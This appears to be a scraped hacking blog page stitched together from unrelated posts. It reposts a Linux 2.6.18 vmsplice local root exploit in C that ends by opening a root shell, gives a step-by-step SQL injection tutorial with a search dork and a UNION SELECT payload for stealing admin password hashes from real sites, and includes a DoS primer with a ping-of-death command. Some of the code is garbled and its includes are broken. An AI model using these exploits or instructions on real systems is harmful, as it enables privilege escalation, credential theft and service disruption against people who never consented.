After this post, do not posts in this section

but , In this site you can see my 3D works : http://m0riiii.ir/3d/

I hope you continue to support me with Your comment

Successful and victorious

bYe

The Animation World !

For Download Exploit Click to Read More

Download

# Author: DigitALL
# Version: 2.6.18-20
# Tested on: Linux System
# Greetz To: Zombie KroNicKq and All 1923turk.Biz Members
# Code : 2.6.18 2008 Exploit’s İs Edited 2009 Version.I Am Tested 2.6.18-20 2009 Linux is Rooted.Coming Soon.By DigitALL
#define _GNU_SOURCE
#include
#include
#include
#include
#include
#include #include
#include
#include
#include
#include
#define __KERNEL__
#include

#define PIPE_BUFFERS 16
#define PG_compound 14
#define uint unsigned int
#define static_inline static inline __attribute__((always_inline))
#define STACK(x) (x + sizeof(x) – 40)

struct page {
unsigned long flags;
int count;
int mapcount;
unsigned long private;
void *mapping;
unsigned long index;
struct { long next, prev; } lru;
};

void exit_code();
char exit_stack[1024 * 1024];

void die(char *msg, int err)
{
printf(err ? “[-] %s: %s\n” : “[-] %s\n”, msg, strerror(err));
fflush(stdout);
fflush(stderr);
exit(1);
}

#if defined (__i386__)

#ifndef __NR_vmsplice
#define __NR_vmsplice 316
#endif

#define USER_CS 0×73
#define USER_SS 0×7b
#define USER_FL 0×246

static_inline
void exit_kernel()
{
__asm__ __volatile__ (
“movl %0, 0×10(%%esp) ;”
“movl %1, 0×0c(%%esp) ;”
“movl %2, 0×08(%%esp) ;”
“movl %3, 0×04(%%esp) ;”
“movl %4, 0×00(%%esp) ;”
“iret”
: : “i” (USER_SS), “r” (STACK(exit_stack)), “i” (USER_FL),
“i” (USER_CS), “r” (exit_code)
);
}

static_inline
void * get_current()
{
unsigned long curr;
__asm__ __volatile__ (
“movl %%esp, %%eax ;”
“andl %1, %%eax ;”
“movl (%%eax), %0″
: “=r” (curr)
: “i” (~8191)
);
return (void *) curr;
}

#elif defined (__x86_64__)

#ifndef __NR_vmsplice
#define __NR_vmsplice 278
#endif

#define USER_CS 0×23
#define USER_SS 0×2b
#define USER_FL 0×246

static_inline
void exit_kernel()
{
__asm__ __volatile__ (
“swapgs ;”
“movq %0, 0×20(%%rsp) ;”
“movq %1, 0×18(%%rsp) ;”
“movq %2, 0×10(%%rsp) ;”
“movq %3, 0×08(%%rsp) ;”
“movq %4, 0×00(%%rsp) ;”
“iretq”
: : “i” (USER_SS), “r” (STACK(exit_stack)), “i” (USER_FL),
“i” (USER_CS), “r” (exit_code)
);
}

static_inline
void * get_current()
{
unsigned long curr;
__asm__ __volatile__ (
“movq %%gs:(0), %0″
: “=r” (curr)
);
return (void *) curr;
}

#else
#error “unsupported arch”
#endif

#if defined (_syscall4)
#define __NR__vmsplice __NR_vmsplice
_syscall4(
long, _vmsplice,
int, fd,
struct iovec *, iov,
unsigned long, nr_segs,
unsigned int, flags)

#else
#define _vmsplice(fd,io,nr,fl) syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
#endif

static uint uid, gid;

void kernel_code()
{
int i;
uint *p = get_current();

for (i = 0; i < 1024-13; i++) {
if (p[0] == uid && p[1] == uid &&
p[2] == uid && p[3] == uid &&
p[4] == gid && p[5] == gid &&
p[6] == gid && p[7] == gid) {
p[0] = p[1] = p[2] = p[3] = 0;
p[4] = p[5] = p[6] = p[7] = 0;
p = (uint *) ((char *)(p + + sizeof(void *));
p[0] = p[1] = p[2] = ~0;
break;
}
p++;
}

exit_kernel();
}

void exit_code()
{
if (getuid() != 0)
die("wtf", 0);

printf("[+] root\n");
putenv("HISTFILE=/dev/null");
execl("/bin/bash", "bash", "-i", NULL);
die("/bin/bash", errno);
}

int main(int argc, char *argv[])
{
int pi[2];
size_t map_size;
char * map_addr;
struct iovec iov;
struct page * pages[5];

uid = getuid();
gid = getgid();
setresuid(uid, uid, uid);
setresgid(gid, gid, gid);

printf("-----------------------------------\n");
printf(" Linux 2.6.18-20 2009 Local Root Exploit\n");
printf(" By DigitALL\n");
printf("-----------------------------------\n");

if (!uid || !gid)
die("!@#$", 0);

/*****/
pages[0] = *(void **) &(int[2]){0,PAGE_SIZE};
pages[1] = pages[0] + 1;

map_size = PAGE_SIZE;
map_addr = mmap(pages[0], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);

memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx\n", pages[0]);
printf("[+] page: 0x%lx\n", pages[1]);

pages[0]->flags = 1 << PG_compound;
pages[0]->private = (unsigned long) pages[0];
pages[0]->count = 1;
pages[1]->lru.next = (long) kernel_code;

/*****/
pages[2] = *(void **) pages[0];
pages[3] = pages[2] + 1;

map_size = PAGE_SIZE;
map_addr = mmap(pages[2], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die(”mmap”, errno);

memset(map_addr, 0, map_size);
printf(”[+] mmap: 0x%lx .. 0x%lx\n”, map_addr, map_addr + map_size);
printf(”[+] page: 0x%lx\n”, pages[2]);
printf(”[+] page: 0x%lx\n”, pages[3]);

pages[2]->flags = 1 << PG_compound;
pages[2]->private = (unsigned long) pages[2];
pages[2]->count = 1;
pages[3]->lru.next = (long) kernel_code;

/*****/
pages[4] = *(void **) &(int[2]){PAGE_SIZE,0};
map_size = PAGE_SIZE;
map_addr = mmap(pages[4], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die(”mmap”, errno);
memset(map_addr, 0, map_size);
printf(”[+] mmap: 0x%lx .. 0x%lx\n”, map_addr, map_addr + map_size);
printf(”[+] page: 0x%lx\n”, pages[4]);

/*****/
map_size = (PIPE_BUFFERS * 3 + 2) * PAGE_SIZE;
map_addr = mmap(NULL, map_size, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die(”mmap”, errno);

memset(map_addr, 0, map_size);
printf(”[+] mmap: 0x%lx .. 0x%lx\n”, map_addr, map_addr + map_size);

/*****/
map_size -= 2 * PAGE_SIZE;
if (munmap(map_addr + map_size, PAGE_SIZE) < 0)
die(”munmap”, errno);

/*****/
if (pipe(pi) < 0) die(”pipe”, errno);
close(pi[0]);

iov.iov_base = map_addr;
iov.iov_len = ULONG_MAX;

signal(SIGPIPE, exit_code);
_vmsplice(pi[1], &iov, 1, 0);
die(”vmsplice”, errno);
return 0;
}

Archive-It is designed to fit the needs of many types of organizations and individuals. The over 125 partners include: state archives, university libraries, federal institutions, state libraries, non government non profits, museums, historians, and independent researchers.

The 950 Collections captured by Archive-It range from subject matters as diverse as “Political parties in Latin America” to the “Matthew Shepard Web Archive” to the “2008 Beijing Olympic Games” to “Iranian Blogs” to “North Carolina State Government Web Site Archive”.

About the Wayback Machine

Browse through over 150 billion web pages archived from 1996 to a few months ago. To start surfing the Wayback, type in the web address of a site or page where you would like to start, and press enter. Then select from the archived dates available. The resulting pages point to other archived pages at as close a date as possible. Keyword searching is not currently supported.

LINK : http://web.archive.org/

Download

Thanks My friend : Amir ( takfanar )

Link download : http://www.mediafire.com/?ozywnu3undt

Good Site To Download Latest Movies, Games, Songs :

ftp://88.87.7.92/

Alright first you are going to need to go to this link right here:
http://milw0rm.com/exploits/5730. And a Script will come up of what to use. Now you need to
google this : inurl:com_idoblog

Find a website you wish to Inject.

Now once you have done that.. you will need to copy this :
Code:
/index.php?option=com_idoblog&task=userblog&userid= and 1=1 UNION SELECT
user(),user(),user(),user(),user(),concat(username,0×3a,password)
,user(),user()
.

Now when you find a website it should look like this
Code:
www.target.com/index.php?
You will need to Erase the /INDEX.PHP?[/CODE] and put in
Code:
/index.php?option=com_idoblog&task=userblog&userid= and 1=1 UNION SELECT
user(),user(),user(),user(),user(),concat(username,0×3a,password)
,user(),user()
now press enter.

If the site is vulnerable you will need the name ” ADMIN ” and then a hash after that.

Go to google, and search ” HASH CALCULATOR ” get the MD5 hash and then you google ” MD5
CRACKER ” and then you just simply fill in what you should do, if the hash is crackable you
will get a password.

Go back to the site you are injecting and type in ADMIN as the username and put the password
you got from the hash as the PASSWORD.

Well done you have successfully finished your first SQL Injection .

soruce : www.hackinglibrary.ws

We will start at the beginning and I will start by saying that if you plan to bring down a
site with DoS its probably going to take more than 1 computer. The rage which has hit with DoS
is DDoS (distributed denial of service) which is a DoS attack, but not done by one user, done
by many users or a bot armie. A famous DDoS attack is the one done to GNR.com the attack
completely took up all the sites bandwith within seconds. There site was recorded to have been
attack by 456 Windows users.Now that you understand the god like power of this raging and more
feared attack. Lets move on to the different types of DoS attacks.

—Fragmentation overlap

By forcing the OS to deal with overlapping TCP/IP packet fragments, this attack caused many
OSs to suffer crashes and resource starvation. Exploit code was realeased with names such as
bong,boink, and teardrop.

—Oversized Packets

This is called the “Ping of Death” (ping -1 65510 192.168.2.3) an a Windows system (where
192.168.2.3 is the IP adress of the intended victim). What is happening is the attacker is
pinging every port on the victims computer causing it to echo back 65510 requests. Another
example is a jolt attack a simple C program for OSs whose ping commands wont generate
oversized packets. The main goals of the “Ping of Death” is to generate a packet size that
exceeds 65,535 bytes. Which can abrubtly cause the victim computer to crash. This technique
is old!

—Nukers

Yet another old form of attack this is related to a Windows vunlnerablity of some years ago
that sent out-of-band(OOB) packets. To the consenting computer causing it to crash.

—SYN floods

A newer technique of DoS is SYN floods, basically this is done through a 3 step process
better known as the three way handshake. When a TCP connection is initiated this occurs.
Under some normal circumstances, a SYN packet is sent from a specific port on system 1 to
a specific port on system 2 that is in the LISTEN state. Then the potential connection on
system 2 is in a SYN_RECV state. At this stage system 2 will attempt to send back a SYN/ACK
packet to system 1.If all works out, system 1 will send back an ACK packet, and the connection
will move to an ESTABLISHED state. Now thats what happens most of the time, but a SYN flood is
different it creates a half open connection. Most systems can sustain hundreds of connections
on a specific port, but it will only take a few half open connections to exhaust all the
resources on the computer.

—Smurf Attacks

The smurf attack was one of the first to demonstrate the use of unwitting DoS amplifiers on
the Internet. A smurf takes advantage of directed broadcasts and requires a minimum of three
actors: the attacker, the amplifying network, and the victim. What happens is the attacker
sends out spoofed ICMP ECHO packets to the broadcast address of the amplifying network. The
source address of packets is forged to make it appear as if the victim system has initiated
the request. Then all hell breaks loose!!! Because the ECHO packet was sent to the broadcast
address, all systems on the amplifying network will respond to the victim. Now take a thought
if the attacker sends just a single ICMP packet to an amplifying network which contains 500
systems that will respond to a broadcast ping, the attacker has now succeeded in multiplying
the DoS attack by a magnitude of 500!

—Fraggle Attack

A fraggle attack is the same as a smurf attack, but it uses UDP ports instead.

—DDoS Attack

This is a much harder to block kind of attack, it has been used against big sites such as
E-Trade, Ebay, and countless others. The problem with these attacks there very hard to trace.
Most traces can link back to @Home users! The new DDoS attacks are termed Zombies or Bots.
These bots rely heavily on remote automation techniques borrowed from Internet Relay Chat
(IRC) scripts of the same name. A group of zombies under the control of a single person is
called a zombie network or a bot army. The master of these armys or networks can do full
fledged DDoS attacks or SYN floods. The basic estimate size of zombie networks are from a few
systems to 150,000 systems. Even a few hundred machines could prove very dangerous.

source : www.hackinglibrary.ws